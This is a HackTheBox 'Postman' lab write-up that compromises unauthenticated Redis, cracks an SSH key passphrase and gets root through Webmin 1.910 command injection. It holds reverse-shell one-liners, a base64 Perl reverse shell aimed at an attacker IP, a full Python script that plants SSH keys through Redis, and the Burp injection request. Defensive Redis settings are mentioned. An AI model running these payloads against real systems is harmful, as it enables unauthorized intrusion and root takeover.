Ports scan

u505@kali:~/HTB/Machines/Postman$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-03-15 12:29:55 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 
Discovered open port 6379/tcp on 
Discovered open port 10000/udp on 
Discovered open port 10000/tcp on 
Discovered open port 80/tcp on 
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV
Starting Nmap 7.80 ( ) at 2020-03-15 08:30 EDT
Nmap scan report for postman.htb (
Host is up (0.86s latency).
Not shown: 997 closed ports
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV -p 6379
Starting Nmap 7.80 ( ) at 2020-03-15 08:36 EDT
Nmap scan report for postman.htb (
Host is up (0.040s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

Port 80


u505@kali:~/HTB/Machines/Postman$ python3 /opt/utils/dirsearch/ -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt" -f -t 50 -u

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: js, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-15_08-41-45.log

[08:41:45] Starting:
[08:41:49] 403 - 292B - /.html
[08:42:00] 200 - 4KB  - /css/
[08:42:06] 200 - 3KB  - /fonts/
[08:42:09] 403 - 293B - /icons/
[08:42:09] 200 - 2KB  - /images/
[08:42:09] 200 - 4KB  - /index.html
[08:42:10] 200 - 3KB  - /js/
[08:42:23] 403 - 301B - /server-status/
[08:42:29] 200 - 8KB  - /upload/
Task Completed

Nothing interesting here.

Port 10000

u505@kali:~/HTB/Machines/Postman$ searchsploit webmin 1.910
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)             | exploits/linux/remote/46984.rb
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There is a remote code execution exploit for this version of Webmin, but it requires an authenticated user with access to the Package Updates module, so it is parked until we have credentials.

Port 6379

The Redis instance accepts connections without authentication and still allows CONFIG, which opens several well-known abuse vectors:

  • Get Webshell
  • Get Reverse Shell—Crontab
  • Get SSH–Crackit

Get Webshell

This vector drops a (PHP) file into the web root. CONFIG SET dir succeeds because /var/www/html is traversable, but SAVE fails because the redis user has no write permission there.

u505@kali:~/HTB/Machines/Postman$ redis-cli -h 
> config get dir
1) "dir"
2) "/var/lib/redis"
> config set dir /var/www/html
OK
> config set dbfilename redis.php
OK
> set test "<?php phpinfo(); ?>"
OK
> save
(error) ERR
> config set dir /var/lib/redis

Get Reverse Shell—Crontab

This vector tries to write a crontab file for the redis user that opens a reverse shell.

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
u505@kali:~/HTB/Machines/Postman$ echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h -x set 1
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 
> config get dir
1) "dir"
2) "/var/lib/redis"
> config set dir /var/spool/cron/crontabs/
(error) ERR Changing directory: Permission denied
> config get dir
1) "dir"
2) "/var/lib/redis"

As expected after the previous attempt, this doesn't work either. Here CONFIG SET dir itself fails: the redis user cannot even enter /var/spool/cron/crontabs, let alone write to it.

Get SSH–Crackit

This vector pushes an SSH public key into the redis user's own authorized_keys. Redis runs as the redis user whose home is /var/lib/redis (the default dir), and since CONFIG SET dir on /var/lib/redis/.ssh succeeds below, that directory already exists and is enterable by the process.

u505@kali:~/HTB/Machines/Postman$ ssh-keygen -t rsa -f postman
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in postman
Your public key has been saved in
The key fingerprint is:
SHA256:5WoRiY1eB6AMHnB9KFCikDDvs3un3EcIIxAzzMmJyHs u505@kali
The key's randomart image is:
+---[RSA 3072]----+
|^*B. ....        |
|B/.+o..+ o       |
|..+.o.o = o      |
| o.Eo. . =       |
|  +. o..S .      |
|   o  . .o       |
|  .    .o        |
|   o.....        |
|  ..oo..         |
u505@kali:~/HTB/Machines/Postman$ (echo -e "\n\n"; cat; echo -e "\n\n") > public.txt
u505@kali:~/HTB/Machines/Postman$ cat public.txt | redis-cli -h -x set crackit
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 
> get crackit
"\n\n\nssh-rsa [...] u505@kali\n\n\n\n"
> config get dir
1) "dir"
2) "/var/lib/redis"
> config set dir /var/lib/redis/.ssh
OK
> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
> config set dbfilename "authorized_keys"
OK
> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
> save

If the dump landed in /var/lib/redis/.ssh/authorized_keys, we can log in as redis with the matching private key. The file is a binary RDB dump, but sshd skips lines it cannot parse, and the blank lines around the key keep it on a line of its own. None of this would work if Redis were bound to 127.0.0.1, protected with requirepass, or had CONFIG disabled with rename-command.

u505@kali:~/HTB/Machines/Postman$ ssh -i postman redis@
Enter passphrase for key 'postman':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
[...]
Last login: Mon Aug 26 03:04:25 2019 from 
redis@Postman:~$ whoami
redis
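The three Redis attempts above are one primitive (CONFIG SET dir and dbfilename, then SAVE) succeeding or failing on file-system permissions. As an added example that is not part of the original write-up, the following Python script speaks RESP directly over a socket (no redis-cli or client library), performs the authorized_keys write with the same blank-line padding, restores dir and dbfilename afterwards, and surfaces the two failure modes seen above as exceptions: CONFIG SET dir fails when redis cannot enter the directory (the crontab case) and SAVE fails when it can enter but not write (the /var/www/html case). The host, port, key file and the /var/lib/redis/.ssh path are assumptions for the lab; the key name crackit is the one used above.

```python
"""Added example (not from the original write-up): write an SSH public key into
the redis user's authorized_keys over an unauthenticated Redis connection.
Assumed: target host/port, a public key file, home dir /var/lib/redis."""
import socket


class RedisError(Exception):
    """Raised for '-ERR ...' replies, e.g. 'Changing directory: Permission denied'."""


def resp_command(*args: str) -> bytes:
    """Encode one command as a RESP array, byte-for-byte what redis-cli sends."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def parse_reply(buf: bytes):
    """Parse one RESP reply; return (value, unconsumed_bytes).
    Handles +status, -error, :integer, $bulk and *array, all this attack needs.
    Error replies are raised so a failed step aborts the chain early."""
    kind = buf[:1]
    line, _, rest = buf[1:].partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        raise RedisError(line.decode())
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        length = int(line)
        if length < 0:                       # null bulk string
            return None, rest
        return rest[:length].decode(errors="replace"), rest[length + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unexpected RESP type byte {kind!r}")


def padded_key(pubkey_line: str) -> str:
    """SAVE writes an RDB file: binary header bytes before the value and a
    checksum after it. sshd ignores lines it cannot parse, so blank lines on
    both sides keep the key on a line of its own (same as the echo -e above)."""
    return "\n\n" + pubkey_line.strip() + "\n\n"


def _roundtrip(sock: socket.socket, *args: str):
    """Send one command and parse its reply (enough for the short replies here)."""
    sock.sendall(resp_command(*args))
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("redis closed the connection")
        buf += chunk
    value, _ = parse_reply(buf)
    return value


def plant_authorized_key(host: str, port: int, pubkey_line: str,
                         ssh_dir: str = "/var/lib/redis/.ssh") -> str:
    """Reproduce the redis-cli session: stash the key, point dir/dbfilename at
    the redis user's authorized_keys, SAVE, then restore both settings.
    Raises RedisError at CONFIG SET dir when redis cannot enter the directory
    (crontab case) or at SAVE when it cannot write there (/var/www/html case).
    Returns the original dir for the caller's records."""
    with socket.create_connection((host, port), timeout=5) as sock:
        original_dir = _roundtrip(sock, "CONFIG", "GET", "dir")[1]
        original_name = _roundtrip(sock, "CONFIG", "GET", "dbfilename")[1]
        _roundtrip(sock, "SET", "crackit", padded_key(pubkey_line))
        _roundtrip(sock, "CONFIG", "SET", "dir", ssh_dir)
        _roundtrip(sock, "CONFIG", "SET", "dbfilename", "authorized_keys")
        _roundtrip(sock, "SAVE")
        _roundtrip(sock, "CONFIG", "SET", "dir", original_dir)          # leave the real dump path alone
        _roundtrip(sock, "CONFIG", "SET", "dbfilename", original_name)
        return original_dir


if __name__ == "__main__":
    import sys  # usage: python3 redis_authorized_keys.py <host> <pubkey-file> (assumed arguments)
    target, keyfile = sys.argv[1], sys.argv[2]
    with open(keyfile) as fh:
        print("restored dir:", plant_authorized_key(target, 6379, fh.read()))
```

The matching private key then logs in as redis exactly as in the ssh step that follows. From the defender's side, every step relies on CONFIG being reachable over the network without authentication; any one of bind 127.0.0.1, requirepass, or rename-command CONFIG "" in redis.conf stops it.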

Lateral movement

The kernel is recent, and sudo -l prompts for a password we don't have, so neither kernel exploits nor sudo are quick wins.

redis@Postman:~$ uname -a
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
redis@Postman:~$ sudo -l
[sudo] password for redis:
Sorry, try again.
[sudo] password for redis:
Sorry, try again.
[sudo] password for redis:
sudo: 3 incorrect password attempts


redis@Postman:~$ cat .bash_history
su Matt
cat /etc/ssh/sshd_config
su Matt
cd /var/lib/redis
su Matt
cat id_rsa.bak
ls -la
cat id_rsa.bak
ls -la
crontab -l
systemctl enable redis-server
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
crontab -l
cd ~/
nano 6379

Upload pspy64 and LinEnum to the target.

u505@kali:~/HTB/Machines/Postman$ cd utils/
u505@kali:~/HTB/Machines/Postman/utils$ scp -i ../postman pspy64 redis@
Enter passphrase for key '../postman':
pspy64                                   100% 3006KB   4.3MB/s   00:00
                                         100%   46KB   1.1MB/s   00:00

pspy64 doesn't show any scheduled job, but LinEnum flags a readable private key backup:

redis@Postman:/tmp$ chmod +x pspy64
redis@Postman:/tmp$ ./
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25  2019 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25  2019 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26  2019 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25  2019 /var/backups/passwd.bak

This is the id_rsa.bak that Matt's bash history shows being read. It is owned by Matt but world-readable, so the redis user can copy it off the box.

Private key

u505@kali:~/HTB/Machines/Postman$ scp -i postman redis@postman:/opt/id_rsa.bak matt
The authenticity of host 'postman (' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'postman' (ECDSA) to the list of known hosts.
Enter passphrase for key 'postman':
id_rsa.bak                                                                                100% 1743    42.2KB/s   00:00

The private key is encrypted.

u505@kali:~/HTB/Machines/Postman$ head -n 7 matt
Proc-Type: 4,ENCRYPTED

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6

We brute-force the passphrase with john, after converting the key into a hash john understands with ssh2john.

u505@kali:~/HTB/Machines/Postman$ /usr/share/john/ matt > matt.hash
u505@kali:~/HTB/Machines/Postman$ john matt.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2020-03-15 10:22) 0.1845g/s 2646Kp/s 2646Kc/s 2646KC/s *7¡Vamos!
Session completed

We try to SSH in as Matt with the recovered key and passphrase.

u505@kali:~/HTB/Machines/Postman$ chmod 600 matt
u505@kali:~/HTB/Machines/Postman$ ssh -i matt matt@postman
Enter passphrase for key 'matt':
Connection closed by port 22

But the server closes the session. The sshd_config explains why: Matt is explicitly denied by DenyUsers.

redis@Postman:/tmp$ tail -n 20 /etc/ssh/sshd_config
#VersionAddendum none

#deny users
DenyUsers Matt

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#   X11Forwarding no
#   AllowTcpForwarding no
#   PermitTTY no
#   ForceCommand cvs server

User flag

SSH is closed to Matt, but DenyUsers only applies to sshd. From the redis shell we can still su to Matt, trying the key's passphrase as the account password. It is reused:

redis@Postman:/tmp$ su Matt
Matt@Postman:/tmp$ whoami
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt

Escalation of privileges

Reusing Matt's password a second time, we log in to Webmin on port 10000.


There is a Metasploit module for the vulnerability found earlier (exploits/linux/remote/46984.rb), but it can also be done by hand. Following the paper "Webmin 1.910 - Remote Code Execution using BurpSuite", we run commands through the Package Updates module's update.cgi, which passes the submitted package name into a shell command without sanitising it (CVE-2019-12840). Webmin itself runs as root, so the injected command does too.

Prepare the payload

The nc on the target doesn't support the -e switch, so we use the mkfifo variant of the reverse shell.

u505@kali:~/HTB/Machines/Postman$ echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f" > payload.1
u505@kali:~/HTB/Machines/Postman$ cat payload.1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

The command is base64-encoded so that it contains no quotes, pipes or spaces that could break the injection.

u505@kali:~/HTB/Machines/Postman$ cat payload.1 | base64 -w 0 > payload.b64
u505@kali:~/HTB/Machines/Postman$ cat payload.b64

The encoded command is wrapped in a bash -c that decodes and runs it. Brace expansion ({echo,X} becomes echo X) keeps the inner string free of spaces. Note that the base64 shown below decodes to a Perl reverse shell to 10.10.14.21:4444 rather than the nc one-liner above; either payload works the same way.

u505@kali:~/HTB/Machines/Postman$ echo " | bash -c \"{echo,`cat`}|{base64,-d}|{bash,-i}\"" > payload.raw
u505@kali:~/HTB/Machines/Postman$ cat payload.raw
 | bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Oyc=}|{base64,-d}|{bash,-i}"

Finally the whole string is URL-encoded for the form body.

u505@kali:~/HTB/Machines/Postman$ . /opt/utils/urlencode/
u505@kali:~/HTB/Machines/Postman$ urlencode "`cat payload.raw`" > payload.url
u505@kali:~/HTB/Machines/Postman$ cat payload.url

Open the listener

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Update package and tamper the request

We browse to the Software Package Updates screen, submit an update and intercept the request with Burp.


We intercept the POST to update.cgi.


In the body we replace the package list with u=acl%2Fapt&u= followed by our URL-encoded payload. The first u= is a legitimate package entry; the second is appended to the command line that update.cgi builds, and since Webmin runs as root, so does our command.


The root reverse shell arrives on the listener:

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
python -c 'import pty; pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# stty raw -echo
stty raw -echo


Root flag

root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt


Daniel Simao 13:10, 15 March 2020 (EDT)